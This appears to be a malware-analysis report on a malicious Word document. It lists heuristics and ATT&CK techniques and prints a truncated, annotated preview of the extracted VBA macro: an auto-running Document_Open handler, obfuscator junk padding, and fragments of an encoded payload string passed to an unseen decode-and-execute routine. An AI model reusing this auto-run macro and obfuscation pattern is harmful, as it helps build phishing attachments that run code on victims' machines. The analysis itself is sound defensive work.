MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is an OLE document containing a Document_Open VBA macro, a common technique for executing malicious code as soon as the document is opened. The macro code is heavily obfuscated and the extracted source is truncated, so its exact function cannot be determined from the preview; it is likely designed to download and execute a second-stage payload. The presence of a Document_Open macro together with the obfuscated VBA code strongly suggests malicious intent, most likely delivered via spearphishing.
Heuristics 4
-
OLE document has large unaccounted-for region — high — OLE_SLACK_ANOMALY — OLE file is 111,030 bytes but its declared streams total only 36,254 bytes; 74,776 bytes (67%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected — medium — 1 related finding — OLE_VBA_MACROS — Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN — Document_Open macro
-
Embedded URL — info — EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body); this is the standard DrawingML XML namespace identifier rather than a network indicator.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18395 bytes |
| SHA-256: ee8125bab15ab2180d9427ddfab0012516ac00d653f187a4d301ac7033170d8b | | | |
Preview script — first 1,000 lines of the extracted script
' Module header as exported by olevba. VB_Base = "1Normal.ThisDocument" appears to
' mark this as the document's ThisDocument class module (the module in which a
' Document_Open handler is honoured); the randomized VB_Name is typical of
' generated/obfuscated macro projects rather than hand-written code.
Attribute VB_Name = "WOKSzAjrcOJvkM"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes (review): auto-run entry point — Word invokes Document_Open when the
' document is opened (see report: T1059.005 / T1566.001).
' Every If ... End If block below tests names that are never assigned anywhere in the
' visible source and assigns results to locals that are never read, so the blocks have
' no observable effect; this pattern is consistent with junk-code padding inserted by
' an obfuscator to inflate the macro and defeat signature matching.
' The single statement with an effect is the call to arwXTMXIaOE near the end.
Private Sub Document_Open()
If CWfXmK = Vpcqw Then
Dim OsaZv()
JWaOzH = OCRkm + LdkMXH + BFqCz + XdhBG
tdKOb = iPMvJ + EpOmb + fDRqiE + YOnjwj
End If
If WGIik <> GhBXE Then
Dim otomto()
iGbHIB = jzzsuz + mRJXE + HXJFZ + fLditM
mQwuz = cwVIi + cFiCc + OpWiLw + hfWbC
End If
If szBOIE > 6 Then
Dim ssFvmz()
vlBDW = jDwFi + uufQP
sUzPl = WbNZw + JtaEr
End If
If diGApA > 8 Then
Dim jEJuMb()
mucMjA = hvqJFY + pcpDhV + ilTIOp + RRSNWi
wzrKw = wjQrk + wqbUrf + EIIJE + KIQdX
End If
If qaqfws <= PpvUcY Then
Dim rppzbi()
dNqon = ozjFtv + lXAwV
wqPNnj = jSTajv + RMMAr + AtSJp + jWATpt
End If
If laOACH >= MViFY Then
Dim ijZLAF()
zCXFX = AJfzd + FScrzL + jEoYnE + iwmbI
nQjiCI = rHwjWA + TfGsb
End If
' Effective statement: concatenates the strings returned by rUVqV, cwbjM, PbXIs and the
' remaining helper functions (rUVqV and cwbjM are defined below; the others fall in the
' truncated part of the extract) and hands the assembled string to arwXTMXIaOE. That
' routine is not in the preview — presumably the decode-and-execute stage; confirm
' against the full extracted module before drawing conclusions about the payload.
arwXTMXIaOE (rUVqV + cwbjM + PbXIs + OiEEiHMCU + SzLiH + LJuvGwKqwa + EWzvnpsuV + UWdFcLtrZXz + NQhYniRcOH + qMsqXJW + lObvwW)
If BziXh <= FzYSU Then
Dim VSpci()
spLFVs = AwwVa + JZRBUb
End If
End Sub
' Start of a second (randomly named) module in the same VBA project; it holds the
' helper functions whose return values Document_Open concatenates.
Attribute VB_Name = "InrzrBVA"
' Returns one fragment of the obfuscated payload: the six string literals assigned
' below are joined on the line `rUVqV = ...` and returned to Document_Open.
' The literals are built from short pieces concatenated with `+` and are dominated by
' the `[` character, which looks like filler or a separator inserted by the obfuscator;
' the decoding routine is outside the preview, so the cleartext is unknown from here.
' `""""` in VBA is a string literal containing a single double-quote character.
' The If ... End If blocks are junk padding (undefined operands, unused results), as in
' Document_Open.
Function rUVqV()
JLiJZvbbppO = "`ja ,S[7[LK,@ [p[b[q" + " [?[F:[;u[ [ [D[Vk[" + " %&5 [i-[P" + "[ [#,[8[ [" + "b[X[^[ [y[C[ [ [!["
If dtvvh < oDNNXN Then
Dim ICwPRi()
bHLFsC = wcMuD + jBEjXL + KFcSUH + QpzUiX
End If
If VhqCfM <> aATUhN Then
Dim wPrFm()
Wftkka = IfsQf + nfWqV + fUibzA + OJqhdY
zWqoGR = EhuID + fZbcZW
End If
If ISXRz <> RwoKko Then
Dim vMQEF()
VbzLfh = jUkQM + SSFIND + ltIEij + KCbPu
End If
If YiKGr >= zrzNXz Then
Dim WwpECB()
zcSscz = pjsUV + stkvB
End If
ZOQmKzmTLz = "ho[ [=[^U[ [d[N" + "[7[ [H[A[_ [7" + "[B[H[ [p[t[*"
wZMrn = "[ [?[e[C[ [$[P[N[" + " [U[<[P[ " + """" + "[" + "QK[ [d[\[+[z4[VB" + "[z[C[)[j[x" + "[E[<[7[e[:[ [ `"
If pRJNC Xor OFPhJf Then
Dim QnOHMI()
TqnGCo = szcRbk + iMwKj + MQzdu + awSfkK
End If
If wziCKN >= VInPh Then
Dim QmbRzf()
jDsJMN = oaRrG + HWfhuz
End If
If rDtjK <> 18 Then
Dim wRwOr()
EQphkD = amjSwL + ohOIHz + kfmvWG + FQwuLu
JmvoSw = aHlzXP + RDpHs
End If
If lDlNw = VWmYkR Then
Dim fvSTp()
wKXBz = rUnMHm + iGXjJ + VMLDUM + FusWl
End If
jbRUrKoFi = "[V[#[-[q[F'K" + "^[R[P[X`[h" + "[FSz[6[I[u[8[" + "j[?d[h[\[:[u[^" + """" + "[-[Z" + "[b[/[Q,o[.["
hvcFASt = "N[x[_`[+[I[8[v[Q[" + "D[L[V[T[pK[A[Q[*o[" + "I[g[E[![b[][r " + "[p6[lj[U'[a[b[7['["
jdzui = "3[q[8[g[P[F[U&[" + "b[*[iA[j[b[:[" + "e[5[h[V[ts"
' Return value: the six fragments in declaration order.
rUVqV = JLiJZvbbppO + ZOQmKzmTLz + wZMrn + jbRUrKoFi + hvcFASt + jdzui
If IJNMuJ > qOnfo Then
Dim vGVqzz()
vqvJi = uHtXzL + puivz + DijDE + KJaYMD
End If
End Function
' Returns the second fragment of the obfuscated payload: three string literals joined
' on the line `cwbjM = ...`. Same construction as rUVqV — `[`-heavy literals assembled
' from short pieces, with junk If ... End If blocks (undefined operands, unused results)
' interleaved as padding. The decoding routine is not in the preview.
Function cwbjM()
RTpzOcYlGTB = "[l6[u[bs[ " + "[$[:k[Z[G[w[F,[l[" + "7[8[+[U[ &[v[U" + "[6[L?[d%K[3[P[E" + "o[+[U[/[![p[N&" + "[ [ S[J[)[+[H"
If iUSHK = baafd Then
Dim jvGXVA()
zvUPj = FXpVjr + DwDsFP + KCzva + CoTPVG
End If
If TmIvMX = IEETf Then
Dim dYRqNW()
vFwmiV = HijID + msUilc + uGTVpP + iXlcAz
hOnWQ = DziYvQ + okEmE
End If
If XCbdK >= ZvZlhD Then
Dim zWaaPM()
njoEB = XaJuP + wDSOW
End If
If XHOFi >= 12 Then
Dim EBlEu()
pqisOR = tzwwY + kpREaz + rkfro + XACJRs
mJMGb = DAGDb + pQzZn + LEUzFK + DbuFqq
End If
If vROEi > PDwqp Then
Dim TIAXZ()
iwlLnq = XiTihU + sSudUq + MoamM + HrBaB
NXXRjd = WGcvV + WtbAN
End If
UlzrjuoWwf = "[*[G[c[$[=[^[ [U" + "[F[P[Xj,[!" + "@[T[6%[>[#`[b[?" + "[H[ [i" + """" + "J[ " + "[f[T[1[5[C]" + "[7[#[a[q[-[\^[n[fo"
wOIaCoHiz = "[l[$['[\[i[7@[;" + "k^[ [J[t[ [+[ " + "[l&[c0[AC@[w+" + "[v[g,[G[ds[/[M[e[T" + "[b[T[3[V[Q[![F[6K[x[" + "h[Z[0[v,[vmo[3"
' Return value: the three fragments in declaration order.
cwbjM = RTpzOcYlGTB + UlzrjuoWwf + wOIaCoHiz
If lUnLq Or FXijzM Then
Dim MqDWzi()
QtituX = CXiSd + iqamN + PswUp + wzjlG
End If
If omdwOh Or jsDIEK Then
Dim ihIUl()
ucvZZP = wTzYOJ + scJaCI
End If
End Function
Function PbXIs()
VHGvP = "[p[{[q[/,[z[x" + "[bo[y&r[w[u[I[" + "#[a[x[g[M[6[" +
... (truncated)
|
|||